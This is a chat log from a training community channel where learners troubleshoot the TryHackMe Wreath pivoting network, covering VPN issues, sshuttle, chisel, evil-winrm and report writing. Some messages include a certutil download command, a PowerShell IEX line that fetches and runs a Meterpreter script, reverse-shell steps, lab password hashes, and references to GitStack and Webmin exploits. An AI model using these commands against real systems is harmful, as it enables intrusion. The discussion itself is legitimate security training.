#wreath-network
ok. interesting to know tho
It was just to demonstrate that an initialised string does basically the same thing
Yep. Python is an interesting language. It has a lot of funny quirks in it
Thank you for all the info. Now to see why netcat isn't picking up the shell lol
Gave +1 Rep to @merry robin
You are most welcome 🙂
"foo" in python returns the string of the literal, which is successful, even if not saved.
I would like to think that it's optimised out, buuuuuuuuuut
@zinc oriole do Holo
ok
@merry robin Please have a look🙂
hello guys, I'm facing a problem. I'm trying to ping the machine but I can't, even though I am connected to the network. I go to the access tab and it says I am connected to the wreath network, and Network State is running, but I cannot ping the machine.
Docstrings are funky
any help?
When did you download your VPN config file?
Well, Windows will drop the ICMP ping requests. So it will not respond to ping. Try an nmap scan.
I just downloaded the config file and tried. Same issue.
Me and the machine are all using Linux.
I face the same issue with nmap.
Is the network up and running? Just for confirmation.
yes it is
If I am not wrong you're trying to ping prod-serv, right?
yes
well then this is something big ig.
Can you send the screenshot of the ping request, like is it saying host unreachable?
Can you?
@fathom vine I could suggest you rejoin the room as you're in the dev network; read the convo from here
it dropped me again into 10.200.72.200
Read this, I guess this is the case with you. Wait until Muiri arrives, he may have a solution for you.
I wish @merry robin would arrive asap. Thank you very much for your help, I appreciate it.
Gave +1 Rep to @mild kelp
you might try leaving the room and rejoining and redownloading the ovpn file
I think I'm going to skip holo for a bit... I don't really want a windows vm on my network right now
Hi guys! I'm at Task 21 Git Server Stabilisation & Post Exploitation. Can't RDP to Git Server, neither with Remmina nor with xfreerdp. It says "Can't connect"... WinRM connection works btw. The remote user and the Remote Management Users group are sorted. Any suggestion?
Can you please provide the output of net users and net localgroup "Remote Desktop Users"?
In the room, it is Remote Management Users🤔
One can try both🤔
I don't remember, if we can solve using any one. Anyhow, one should try both🙂
I'm listed as a member in both...
Remote Desktop Users is for RDP, Remote Management Users is for WinRM
I can see the issue now, I have to add myself as a Remote Desktop User also...
I can finally access final Machine, all hail reset!
Task 11
no-agent-forwarding,no-x11-forwarding,no-pty: tried these with my public key in the authorized_keys file but I'm still able to log in using ssh from the other machine
Never mind. I just figured it out
I had this doubt from the beginning: why are we copying our own public key into authorized_keys? Now I understand that people who have our private key can't get a shell on our machine due to these no-agent-forwarding,no-x11-forwarding,no-pty restrictions. I initially tried logging in with a password from another local machine, which apparently worked because I'm not using the private key.
I just wanted to confirm this, but a port forward helps us access a port on a target machine through a compromised machine on the network, and a proxy helps us run almost any command on the target machine through the compromised machine, but the tradeoff is speed, right?
Kinda
There isn't really a huge speed difference between the techniques a lot of the time -- not noticeably anyway. Port forwards are usually quicker than anything involving proxychains though, so, yes. The speed disadvantage is when you try to route a lot of traffic through a proxy (e.g. with Nmap).
A port forward makes a connection (almost like a tunnel) between two ports specifically -- one on your machine, one on the target. A proxy is more general -- it opens up access to everything that the compromised machine can access.
The big tradeoff is how much messing around is involved. Port forwards are clean and simple -- proxies involve a bit more work.
Ok thanks for clearing it up
Task 14
Forward socks proxy isn't working, am I doing anything wrong?
Ehhhhhh that depends on the type of proxy
I can set up a proxy off a Linux box in about 10 seconds
Okay Mr Pedantic. Smh.
The hacky proxies that we normally use in compromised environments are often a pain in the arse.
A proper proxy is fine. Sshuttle is fine
I need to see about getting some help with the Wreath room. I am on the pivoting part with the traffic forward and using the sshuttle command I am getting a permission denied (publickey,gssapi-keyex,gssapi-with-mic). I have verified my id_rsa looks right. It is the same token I used to ssh yesterday. I have seen in the googles where people are talking about updating the sshd config file on the server. I don't want to break the server for others.
OMG........ I did not have the line breaks in my cert. I had made the cert all one line when copying it.
Hey!! I'm currently logged into the Git server with WinRM and I'm trying to run mimikatz from there
But the mimikatz doesn't seem to work!!
I transferred the mimikatz using Powershell!! And I'm not using the RDP
Are there any kind of extra options that need to be passed for mimikatz to work with evil-winrm?
It won't work in WinRM @marble oasis -- hence why you were instructed to use it in RDP
Your virtual IP is 10.50.161.24
And the wreath network is within the subnet 10.200.164.0/24
You are on a different subnet, try re-joining the room after leaving it.
And or try regenerating your VPN configuration file
Edit: fixed an incorrect octet in IP
Using openvpn, there are ip routes added to access the connected machines.
You need to be within the same subnet in order to access the connected networks.
Wait, what?
The VPN never allocates IPs inside the training subnets. The VPN IP there is 10.50.161.24, which is a normal Network user IP.
I am retrying all. I just connected, then compromised the 1st machine, waited for some time... when I came back, I am facing the problem
Same problem, tried to regen the VPN and rejoin the room
Here you're saying something is wrong with the IP, but using this IP I have compromised the 1st machine
So what can I do here?
Hey, I don't know what's going on. I rejoined and reconfigured but nothing changes. Even the VPN is also the same, also the room, and my progress is also not reset.
Sorry, I forgot about the ip routes 😅
openvpn adds these for you to connect to the networks made accessible via the configuration file.
I mean how can I fix this?
Please wait for Muiri, I think he found something wrong.
I can't do anything about network issues I'm afraid -- I don't have access to the AWS side of things.
@fair breach might be able to help debug though 🙂
ok thanks..
Gave +1 Rep to @merry robin
Is this only from my side or is it everyone?
No idea -- I can't see whether there's anyone else connected to 164
This is from my friend's side. Is this ok? Can I go with this?
So in Wreath, when setting an IP for the reverse shell do I use the 10.200.x.x IP or the 10.50.x.x IP?
You need to use your IP address, see https://tryhackme.com/access
Change the network to Wreath and then you will see your virtual IP address that you can use for reverse shells
It should be 10.50.x.x
gotcha thnx
And would you be able to help me stabilize the shell? I know it's not needed but it's bothering me because it screws up my terminal every time and reset doesn't work lol
There should be some information about this in the room itself.
I should
I'll try rlwrap
Yeah, that's what I'm going off of
I keep messing up bringing in a bash shell using python
breaks my terminal every time
There is a tool named pwncat.
You can try it, see https://github.com/calebstewart/pwncat
Make sure to do tasks manually as well😋
I am a beginner, you may DM me if you need any help from me. I will try to help.
Have fun with this room👍
I will try, and thanks for the invite
@merry robin Thank you for the room! I really enjoyed myself, lots of tools I don't usually get to play around with. I noticed two things while working through the Tasks
- Spelling mistake in Task 22 Command and Control Introduction (Probably more but this is the one I noticed): "...As such, there are actually two public versions of Empire -- the original (now very outdated), and the current BC-Sercurity fork. Be careful to get the right one!" There is an r too much in BC-Security.
- There is an issue with Win-Kex (Kali under WSL2) and sshuttle starting in Task 15. It was mentioned a couple times in here, but I couldn't find a quick fix. So here it is (behind a spoiler tag in case someone wants to dig on their own): ||Calling update-alternatives --set iptables /usr/sbin/iptables-legacy fixed the error for me, see here: https://wiki.debian.org/nftables#Reverting_to_legacy_xtables||
Gave +1 Rep to @merry robin
Good catch on the typo, thanks!
Hey all. For some reason I am not able to connect to the first server. I have left the room and rejoined, I have redone my vpn file and reconnected.
ping 10.200.159.200
PING 10.200.159.200 (10.200.159.200) 56(84) bytes of data.
From 10.50.156.1 icmp_seq=1 Destination Host Unreachable
From 10.50.156.1 icmp_seq=2 Destination Host Unreachable
From 10.50.156.1 icmp_seq=3 Destination Host Unreachable
From 10.50.156.1 icmp_seq=4 Destination Host Unreachable
From 10.50.156.1 icmp_seq=5 Destination Host Unreachable
From 10.50.156.1 icmp_seq=6 Destination Host Unreachable
From 10.50.156.1 icmp_seq=7 Destination Host Unreachable
I can hit 10.200.159.250
Please can whoever made changes on the .200 undo them?
I need some help with Wreath. It says that it is running but I got no response from ping or trying to get into the webserver that it has available. It was working fine these 3 days I've been in the machine but now idk.
Same issue...
reset the network
Hello. I have the WreathNetwork on "My Rooms" and I especially remember the 7-day streak I did for that.
But when I go to the Access page, it says that I don't have access to any networks.
I don't see any JoinRoom button and I am able to answer questions(in ability).
I also reset the progress on it but still can't get an openVPN file for download.
Should I leave the room and rejoin?
will it require another 7 day streak? 😒
Okay so issue resolved: Leave the room and rejoin worked.
Classic OFF and ON.
XD
Are ya now
Hi guys, I wonder what this is, I have been trying to connect to Wreath.
On Wreath network it says I do not have access to networks
I am a monthly subscriber
Sorted thank you.
Hi task 33, bonus question. I'm not really experienced with C#, I've visited the github link but seem not to understand what I need to do to write clean service with my payload embedded in it. Managed to escalate with different code but the error is still present when starting the service. Any tips on how do I do it, or should I skip it over since I don't know C#?
It looks like the connection to the 150 and 100 machines is not working from the 200. Is anyone else seeing this?
When in the machine, cat /etc/shadow outputs the hashes of the users. Then I went to copy the root hash and it is wrong. The hash I'm seeing is "$6$B6O5HFsVwU7Kaak3$6T//VQ/1oEb4AAydrH6TI.jBhGPfy56nIM7uUXhUoNoX5RtTsoaKKbnaUE5wFuNVvL70oe8tY.ScVSf5N7aYK."
refresh the page and try resubmitting it.
it's also possible a user changed the password
Hi
I think you should mark this like spoiler
||Like this||
The exploit 43777.py doesn't seem to work on git-serv. I've exploited once before but the network got reset and now I'm redoing some of the steps and I'm stuck on this. I just changed the IP and the file name of exploit.php, as well as the shebang and ran dos2unix. Is it just me getting stuck here?
OK I figured it out. I had to change exploit.php in 2 places
I can't seem to get my exploit running, any tips would be really helpful ❤️
python -m pip install requests
Requirement already satisfied: requests in /home/elliamy/anaconda3/lib/python3.8/site-packages (2.24.0)
Requirement already satisfied: certifi>=2017.4.17 in /home/elliamy/anaconda3/lib/python3.8/site-packages (from requests) (2020.6.20)
Requirement already satisfied: chardet<4,>=3.0.2 in /home/elliamy/anaconda3/lib/python3.8/site-packages (from requests) (3.0.4)
Requirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /home/elliamy/anaconda3/lib/python3.8/site-packages (from requests) (1.25.11)
Requirement already satisfied: idna<3,>=2.5 in /home/elliamy/anaconda3/lib/python3.8/site-packages (from requests) (2.10)
(base) elliamy@ElliPC:~/Documents/Wreath/Tools$ python2 43777.py
Traceback (most recent call last):
File "43777.py", line 17, in <module>
import requests
ImportError: No module named requests
Maybe try python or python 3
It has to be python 2 :p
running it with the other 2 gives the same error btw
besides python3 which gives a syntax error as it's python2
Oh....... Weird 
the problem was pip was only letting me use the python3 directory, so I just had to move the files to the python 2.7 directory
still getting stuck on 'get user list' tho
It's so frustrating
If anyone knows how to fix this, I would be really, really grateful. Feeling defeated
[+] Get user list
Traceback (most recent call last):
File "43777.py", line 47, in <module>
r = requests.post("http://{}/rest/user/".format(ip), data={'username' : username, 'password' : password})
File "/usr/lib/python2.7/dist-packages/requests/api.py", line 119, in post
return request('post', url, data=data, json=json, **kwargs)
File "/usr/lib/python2.7/dist-packages/requests/api.py", line 61, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 542, in request
resp = self.send(prep, **send_kwargs)
File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 655, in send
r = adapter.send(request, **kwargs)
File "/usr/lib/python2.7/dist-packages/requests/adapters.py", line 516, in send
raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPConnectionPool(host='10.200.187.150', port=80): Max retries exceeded with url: /rest/user/ (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f2eacd26c50>: Failed to establish a new connection: [Errno 110] Connection timed out',))
I got the sshuttle going, so that ain't it
actually, the website is down, maybe someone accidentally brought it offline?
Hello, what website are you talking about?
the gitstack one
lemme check
it's ok, I just worked it out
nice
😄 happens
been pulling my hair out for ages 😄
🙂
is the network down?
can anyone add some reset votes? Kinda took the machines offline by mistake
aight I'm on task 35 and I'm in evil-winrm and try to download the website.git dir but it does nothing. It just says downloading website.git and instantly says it was successful but I don't have it on my machine
This happened yesterday, why does Wreath just die sometimes?
You know the networks sleep if you don't extend them, right?
Otherwise, it's often people being dicks and turning off .200 manually
I thought it had like 3 hours left or something 😭
What, is it possible to extend the time up to 3 hrs?
I didn't know that.
yeah, I kinda took the network off by mistake, had a typo on my command and it just crapped itself
only 1 more vote to reset it tho
I put chisel on git-serv but running ./chisel-myname -h gives no output and I can't seem to get it to forward traffic. Any idea what I may be doing wrong?
I definitely uploaded the Windows chisel provided by the room using evil-winrm
I'm stuck on task 34 due to chisel not working
Do I need to do Windows' equivalent of chmod +x?
Kinda @hollow jackal. Make sure it has a .exe extension
ok that works. thanks
forgot Windows requires extensions
I don't really like having to turn FoxyProxy on and off going between normal pages and proxied pages. Does anyone know a way to get proxying for just some URLs on Firefox?
Yep, in the settings you can configure a regex/mask to only proxy (for example) 10.0.0.0/8
I think that'd be 10.*.*.* or something, not sure how mine is set up
Someone renamed the website.git dir to website1.git
I seem to be unable to download website.git with evil-winrm's download. I've tried both download website.git and downloading the compressed zip of it, but the files are nowhere to be found in the directory I started evil-winrm in. Any idea what's wrong?
It doesn't even take a minute or 2 to download, it just said it's a success
I've tried full/relative paths, back & forward slashes, but nothing seems to work and evil-winrm just says "download successful" but nothing appeared on my machine
Aside from WinRM and RDP (I know I can mount with RDP but hate the speed), how can I upload to and download from a windows machine? Is there an easy mount command?
you can use smbclient
if you have the correct privileges, you can connect to the C$ share
I have evil-winrm as Administrator. How can I check SMB from the victim machine?
there's 3 shares that will always be on the machine, C$, ADMIN$ and IPC$
if you use smbclient //ip/C$ -U 'DOMAIN/USER'
you'll get dropped into a cli-like file browser
The dir website.git got renamed to website1.git but the web server is still running. Should I rename it back to website.git?
It's a sandbox -- go for it 🙂
Worst thing that can happen is it breaks even more -- in which case you just reset it
If it's already broken, and it's in an environment that ultimately doesn't matter, just go for it and see what happens 😁
you can install a c2 client 🙂
you can use curl
Even Meterpreter would do 🤷♂️
there's nearly unlimited ways
^^^^
Right. Way past bed time
May or may not have just deprecated a server at 4AM, half drunk, and my God do I need to sleep off the stress
I think in the room it explains setting up an SMB server on your local via python
It does indeed 🙂
Later on though
you can use certutil
like certutil.exe -urlcache -split -f http://10.200.145.200:15881/chisel_1.7.6_windows_amd64 chisel.exe
echo IEX(New-Object Net.WebClient).DownloadString('http://10.200.145.200:8081/meterpreter-64.ps1') | powershell -noprofile
to grab a file with ps
I intend to go back and try a bunch of things like that once I've finished the room
I think I took a whole extra day playing with chisel, and another with empire
I'm trying to do PtH with Administrator's hash using cme, psexec and smbclient but they're all timing out. Is this behavior expected on this box?
I have sshuttle running for x.x.x.* and chisel forwarding to the personal PC
I'm trying to exfiltrate stuff by hosting an SMB server with smbserver.py -ip tun0-ip sharename sharedir but running net view \\my-ip errors with no result. What am I doing wrong?
I managed to get evil-winrm to download. I had to run it as root, download with the full path, and the download lands in /usr/share/evil-winrm rather than the dir I ran it in.
Does anyone know some markdown/latex template I can use for writing the report? I prefer using plaintext docs with something like pandoc.
I've only found 1 nice template (https://github.com/robingoth/pentest-report-template) but more would be nice for reference
Are there some vulns not covered in the room I can try and learn about?
Hello, I am having trouble with the hash from task 6. I know I have the root hash but when I copy and paste it over to THM for submission, it keeps returning "incorrect"
Someone probably changed the password.
reset the network
refresh the page and make sure you haven't triggered rate limiting first
Okay thank you
How should mimikatz hash dumping be reported? Should I include it as a vuln? If yes, what CVSS score should it be?
What CVSS score is "running web service as root"?
Be aware that this is personal opinion and if asking different people you're gonna get some different answers.
imo Dumping stuff with mimikatz is bad, but not the real issue. It's just one of the ways you can abuse creds being stored and not correctly protected, if you have enough access to run mimikatz you can usually also just straight up dump SAM/SECURITY from the registry or dump LSASS. SANS has a blog which goes into detail about what to do against those attacks: https://isc.sans.edu/forums/diary/Mitigations+against+Mimikatz+Style+Attacks/24612/ If you want to assign a CVSS score I would place that somewhere around 7.3 (CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N) - 8.1 (CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N) depending on how much you had to work to get around the protections to be able to run mimikatz
Same with running a web server as root, it's usually not a good idea, but not the actual issue. If you want to mention it there is something called Common Weakness Enumeration, which has a category for it: https://cwe.mitre.org/data/definitions/250.html
Common Weakness Enumeration (CWE) is a list of software weaknesses.
The issue is the stuff you actually managed to exploit on the server, which was then amplified by the fact that the server was running as root, which means that Confidentiality, Integrity should be HIGH instead of LOW because you got access as root and not as www-data
If I understand you correctly, I should simply report the known CVE together with "running as root" as a single higher severity, instead of reporting them individually with their own lower severities.
CWE is very helpful in categorizing vulns
Given a CVE, should I report it as "CVE-xxxx-xxxx" or its actual vuln like "RCE"?
If you find something that has a CVE I would add that to the vuln, something like CVE-2012-2311: Apache cgi-bin Remote Code Execution maybe?
also, If you keep finding CVEs on a real test, it points to a larger problem the customer has: Patch management, because these vulnerabilities are actually known and you should have patched your systems.
hey!! The SANS page is showing 503
how many points do you get from wreath?
are the points the equivalent of a really long walkthrough?
That's the number of the beast...
Isn't that 666?
- The neighbor of the best
667 - The Nearest-Neighbour of the beast
665 the closest guess to the best without going over
It's telling me my hash is wrong, any way to fix?
Hello, I am trying to complete Wreath Task 6
And it won't accept my answer if I could dm anyone I would really appreciate it! 😀
If the network resets, are all the things the same or do I have to redo all the previous tasks?
If the network is asleep, that is, it automatically stopped after the available time was over and no one extended the time.
Then all of your work should stay unchanged, unless someone tampers with it or the network is actually reset
I hope this is correct, I completed this wonderful room under 8-10 hours😋
And obviously, you will have to setup all of the connections again. That is straightforward🙂
Hey!! I'm having some trouble with Chisel!! I opened a forward proxy in the git server and connected via my attacker's chisel client!! Then used FoxyProxy but my client reports i/o timeout (even after the 10th attempt)
And yes, I've opened the port in Git-Server's firewall
Somebody help please?
Hey, I was just learning how one can stabilize a reverse shell, and these are the methods that I learnt
get a reverse shell as always: nc -nvlp 8080
press CTRL+Z
stty raw -echo
fg
reset
However, at the point of entering reset, I can't press enter, it just gets stuck there and I can't do anything. When I press the return key, it displays ^M instead of return itself. I've provided a video
└─$ echo $TERM
xterm-256color
└─$ echo $SHELL
/usr/bin/zsh
You're in zsh so you need to combine the stty raw -echo and fg into stty raw -echo; fg
Hey thanks so much man, I couldn't find any solutions online 🤗
I got another problem now 😅 , wtf is this happening 👇
Gave +1 Rep to @strange bison
This happens when I press enter after a command
Run reset command to reset the terminal.
This will re-initialize the terminal. It is used to fix abnormal state of the terminal console.👍
Looks like a possible
line
break
issue😂
Thanks but it doesn't fix the issue, it's still the line break issue
Gave +1 Rep to @lusty saffron
Please let me know if you find any solution to this, it might be helpful😄
Wreath is one of the best networks to do and the explanations are on point
Agreed, but please don't patch the starting point
sometimes the port 1000 gets closed
It might be a different port, ||10000||
I'll see about making it harder to mess with if I get a second at some point. That bit is on a fricken' init.d script though, if memory serves.
The RCE automatically connects to the port, I don't think there is a manual override
Cheers Muir, very much appreciated! 🙂
It is actually the port ||10000, Webmin 1.890, backdoored package||
There should be a manual override in my script for it?
I went... very over the top with that one
Ahhh
right I'll have to review the code again
if there is a flag that allows for port specification I'll have to sus it out
There is indeed. The script properly takes the required arguments.
The flag is -p/--port
Ahaha, you know my script better than I do. Thank you 😄
Gave +1 Rep to @lusty saffron
hey guys, found nothing in the history so here it goes. Trying to run the WebMin 1.890 exploit from task 6. Tried the one from the room, metasploit and a couple of other python scripts from google but none worked. Every exploit told me the target is vulnerable but no commands got executed, nor did i get a rev shell. I triple checked every ip, tried different ports on my machine and tried all that on two VMs on two different host laptops 😄
Anyone got an Idea why that happens? am i missing something
I can't remember if I put a firewall on that machine, but the fact I explicitly said "Try choosing a well-known port such as 443 or 53" would indicate that I probably did
tried 443, 53, 8080, 80 and the standard funny ones like 1337 6666 and so on 😄
Having said which, that error is interesting. It clearly manages to execute its nonce check or it wouldn't get to that stage
I suspect someone has messed with that box. Try going for a reset
Those were my 2 guesses. Either I overlooked some ultra stupid mistake I made or something messed up. We were at 2/8 reset requests when I wrote this, so I thought maybe I'll find another solution until then 😄 7/8 right now, so now I'm waiting. Thanks anyway for the fast replies!
reset of the network did the trick
SHELL=/bin/bash script -q /dev/null try this
Gonna have to be a little more specific than that :)
Hii
I have problem connecting to wreath
I mean I can connect to the network
But after that nothing is responding or working
Having this problem since last night
Do you mean that you are not able to ping and/or connect to the first machine?
If that is the case, try leaving and re-joining the room, it won't affect your access (7 day streak requirement).
And try to re-generate your VPN pack
Thanks that worked
I want to URL encode the reverse shell code but I am getting an error. What am I doing wrong?
You are trying to make a POST request, but aren't you missing the parameter name here?
It should be a=... not a+...
And to urlencode the data try urllib in python
from urllib import parse
payload = """your data comes here"""
print(parse.quote(payload))
Or you may try any tool available online
You may want to write a script to send the payload (commands), to do the same process you are trying to do using curl.
That way, it will be easier to save your results for the report
This will be my first time trying to make a report, so I just wrote what I found with enumeration and what exploit worked or which ports were open etc. I didn't really screenshot the stuff etc.
A few minutes ago I could connect to it but now I can't
nvm I restarted the server and it works
Don't worry. I personally take multiple screenshots including the context where possible😆
Just wanted to confirm this but I am using virtualbox for kali. I am supposed to install docker for the command and control section right?
But the note in the introduction says I might have problems while using VirtualBox
No, you might have problems while using the AttackBox
I read that wrong ;-; I thought it was VirtualBox 🤦♂️
I think I broke Wreath, I managed to get an initial shell and I accidentally closed the terminal. When I try to re-run the exploit I get this
sorry If I messed it up, I'm unsure of what to do now.
@untold hazel As much as I appreciate the DM, it would be better in here as others might benefit also.
Shouldn't it be https://MACHINE_IP:10000/ (HTTPS)
What say Muiri?
There is an exploit in metasploit framework as well, open up msfconsole and search for it - search webmin👍
You're encouraged to avoid the msf version
It just gives you the version that you tried to use 🤷♂️
The exploit was deployed against the IP address -- it defaults to HTTP, so http:// is in the error message
Alright😅
IIRC, there was SSL handshake when I used your script.
when I visit the web url you mention I get this, I tried the exploit again just now but still get connection refused. I think a box reset will fix the issue, just got to wait for enough votes for reset...
Is it because of the domain name?
MACHINE_IP => thomaswreath.thm?
It might be visible from the nmap scan. I gotta take a look at my report first😆
I have 10.200.193.200 added to my hosts file already
The exploit worked first time but for some silly reason I closed the terminal, noobie error.
Alright, I forgot that you were successful in the first attempt.
So this is ruled out anyway😅
I am not sure why closing the terminal or your session would interrupt the Webmin service.
Please tag me if you figure out the issue🙂
I think the initial exploit worked and me closing it has caused an issue, I'll let you know, thanks for trying to assist.
When I try to pivot to .150 host with sshuttle, I get the following error. Can anyone help?
# Warning: iptables-legacy tables present, use iptables-legacy to see them
fw: iptables -t nat -N sshuttle-12300
fw: iptables -t nat -F sshuttle-12300
fw: iptables -t nat -I OUTPUT 1 -j sshuttle-12300
iptables v1.8.7 (nf_tables): CHAIN_ADD failed (No such file or directory): chain OUTPUT
fw: undoing changes.
# Warning: iptables-legacy tables present, use iptables-legacy to see them
fw: iptables -t nat -D OUTPUT -j sshuttle-12300
iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'OUTPUT', '-j', 'sshuttle-12300'] returned 1
fw: iptables -t nat -D PREROUTING -j sshuttle-12300
iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'PREROUTING', '-j', 'sshuttle-12300'] returned 1
fw: iptables -t nat -F sshuttle-12300
fw: iptables -t nat -X sshuttle-12300
fw: fatal: fw: ['iptables', '-t', 'nat', '-I', 'OUTPUT', '1', '-j', 'sshuttle-12300'] returned 4
c : fatal: cleanup: ['/usr/bin/sudo', '-p', '[local sudo] Password: ', '/usr/bin/env', 'PYTHONPATH=/usr/lib/python3/dist-packages', '/usr/bin/python3', '/usr/bin/sshuttle', '-v', '--method', 'auto', '--firewall'] returned 99
This is the command I used!
sshuttle -r root@10.200.55.200 --ssh-cmd "ssh -i id_rsa" 10.200.55.0/24 -x 10.200.55.200
Seems like this is an error from your system, maybe you need to see if there is an entry already present there as shown in the stderr. Perhaps because you ran sshuttle before and it was killed/terminated abruptly.
Check sudo iptables --list, it might show something.
Are you using WSL2?
Hi, can I ask a question? Does the Wreath room have a problem where you cannot see the start machine button? Under repair? Or is it just me having the problem?
have you joined the room?
Did you try adjusting your screen zoom?
Yup, I have joined this room, it's the same when I change the screen zoom
Yes. Is that the problem?
Yes
what is the issue?
@stoic flicker did you get WSL2 working with sshuttle in the end?
Nope.
It doesn't support the routing and network features that SSHuttle requires.
I asked someone else for a reason
Nope
iptables is empty.
# Warning: iptables-legacy tables present, use iptables-legacy to see them
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Used proxychains instead
It does not work with WSL2...
So you did a ssh proxy?
Yeah it's got a weird network stack
IIRC, proxychains uses socat as the SOCKS proxy
Ssh proxy should also work
Using -D
Ah ok. I was thinking that since I have ssh already I will do something like ssh -D 1080 root@10.200.x.200 -i id_rsa
thanks for the help mate
I'll check the issues on GitHub once I get home
I haven't used WSL/WSL2 much, thanks for letting me know about this🙂
Please ask or tell what you have to share🙂
@lusty saffron I have a problem connecting to the Wreath network
I have got the initial access and am in the middle of the tasks
Now I am unable to connect to the network; it shows no route to host, or I'm unable to ping the first machine
Is your openvpn client running correctly?
Yep, it connected correctly and there are routes to the Wreath network
Alright, looks like the network went to sleep.
Did you check whether the network is running or not?
If not, you should then Start it.
Your changes will still be present there after the network starts again
There should be 3 options (red, yellow, blue) below the network connection diagram on the room page.
Are you sure the network is running?
Try refreshing the page, it might have stopped.
iam 100% sure its running
Well then, I can't help😅
i think some one has knock out me from network or something
whom i can contact for help
As you said, you got some issues in the middle of tasks.
This suggests that the network has gone to sleep.
I can't think of any other issue, given your details.
Someone will surely help you, give it some time.
@lusty saffron If the network goes to sleep, there is no Start option highlighted, or the network is showing as running
How do I shout out to the THM support team?
Try Ctrl + F5 or Ctrl + Shift + R to hard refresh
There should not be any urgency for that, Muiri may help you
@lusty saffron still same result
Still the same. I even downloaded the new Wreath network VPN and connected again
after leaving and joining the room
@merry robin can you please help?
Also, verify yourself first. You may be required to share some screenshots.
How do I send screenshots?
!docs verify
I am unable to upload here
You gotta verify yourself first
Gave +1 Rep to @lusty saffron
Great, and what does the ping command output?
ping shows unreachable
$ ping 10.200.121.200
PING 10.200.121.200 (10.200.121.200) 56(84) bytes of data.
From 10.50.118.1 icmp_seq=1 Destination Host Unreachable
From 10.50.118.1 icmp_seq=2 Destination Host Unreachable
From 10.50.118.1 icmp_seq=3 Destination Host Unreachable
From 10.50.118.1 icmp_seq=4 Destination Host Unreachable
From 10.50.118.1 icmp_seq=5 Destination Host Unreachable
I did all the necessary steps before asking here @lusty saffron
No issues, someone will help you soon👍
@lusty saffron waiting
You don't need to tag me😆
I can't help with this
Could you also provide your openvpn output?
Put the output in between ```here```
2021-08-26 10:07:32 OPTIONS IMPORT: --ifconfig/up options modified
2021-08-26 10:07:32 OPTIONS IMPORT: route options modified
2021-08-26 10:07:32 OPTIONS IMPORT: route-related options modified
2021-08-26 10:07:32 OPTIONS IMPORT: peer-id set
2021-08-26 10:07:32 OPTIONS IMPORT: adjusting link_mtu to 1624
2021-08-26 10:07:32 Using peer cipher 'AES-256-CBC'
2021-08-26 10:07:32 Outgoing Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2021-08-26 10:07:32 Outgoing Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
2021-08-26 10:07:32 Incoming Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2021-08-26 10:07:32 Incoming Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
2021-08-26 10:07:32 net_route_v4_best_gw query: dst 0.0.0.0
2021-08-26 10:07:32 net_route_v4_best_gw result: via <redacted> dev eth0
2021-08-26 10:07:32 ROUTE_GATEWAY <redacted> IFACE=eth0 HWADDR=00:0c:29:0a:d0:be
2021-08-26 10:07:32 TUN/TAP device tun0 opened
2021-08-26 10:07:32 net_iface_mtu_set: mtu 1500 for tun0
2021-08-26 10:07:32 net_iface_up: set tun0 up
2021-08-26 10:07:32 net_addr_v4_add: <redacted> dev tun0
2021-08-26 10:07:32 net_route_v4_add: 10.200.121.0/24 via <redacted> dev [NULL] table 0 metric 1000
2021-08-26 10:07:32 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
2021-08-26 10:07:32 Initialization Sequence Completed
$ ssh -i id_rsa root@10.200.121.200
ssh: connect to host 10.200.121.200 port 22: No route to host
Maybe a bit late but redownload the vpn pack?
I am doing Wreath and am quite confused about reverse shells, port forwarding and tunneling. They all look similar to me.
Anyone can Explain in brief? Or any blog or something to read about it?
anyone having a hard time pinging the machine?
what are you having a hard time with?
When I ping the IP of the initial machine it won't respond back. I'm almost done with the Wreath machine.
yeah, I'm on the task 41 currently.
ok sorry then friend, Im not that far ahead
Can't continue the task, I guess there is an issue on the machine. I can't ping .200 either.
did the network timeout on you?
not sure but it shows when I ping that destination host unreachable. weird
could be the wreath network timeout....just a guess, refresh the main wreath page and see if its offline
not sure what's happening. will try to configure my VM network.
good luck
I'm coming back to finish this and my ovpn isn't working anymore. I don't have the option in the access networks page to regenerate it, only holo. How can I regenerate my ovpn for this?
I am getting this while trying to forward the proxy and access the web server on the personal PC. What am I doing wrong?
Also, when I browse to 127.0.0.1:4444 (my listening port) it keeps on loading and doesn't give me a result
Meaning I probably didn't make the connection properly
Any idea what I may have done wrong?
I am not getting anything saying the server is running or similar when I run this command either, btw
I fixed the port from 17000 to 16000 but still the same result
Hi Tech, I am a subscribed user and the required streak is above 7, but on my side the account doesn't show the Start button or the network plan image
Sounds like you haven't joined the room?
I did join. Another day I wanted to continue this room, but it has a problem like this: it doesn't display, so I tried resetting my progress, but it's the same problem
If somebody knows what I might be doing wrong, please help
I think my binary on the compromised machine isn't working properly
How do I fix that?
I ran it without the ./ and it doesn't recognize it as a command/script
It should be .\program-name.exe
If that still doesn’t work, verify the location of the executable and that you’re calling it from the right place and/or you picked the correct release from the GitHub
It still doesn't work
And it's from the right place
Wait
I am using the Linux binary on Windows, fuck
That'll do it
Cannot access the Wreath machine. I am a subscriber of TryHackMe. This room is not showing any network state. Can you help me?
Do subscribers also need a 7-day streak?
please help me.
Hi here, if someone can help me with this room. I have a problem with the root user's hash in the enumeration at the beginning... it's not the same. What can I do? Take the old one?
The root user password hash is showing an error after I put it in
root:$6$hlOGzVl7VI17Ij8Y$bvLi6CRKA/MWT8Wbnr9RxsgTD4wXm76nCX01vZu/VP0qb4ceFng.pakE6KybHOw8jLF8HO8yBu09BnzWdj/yn1:18870:0:99999:7:::
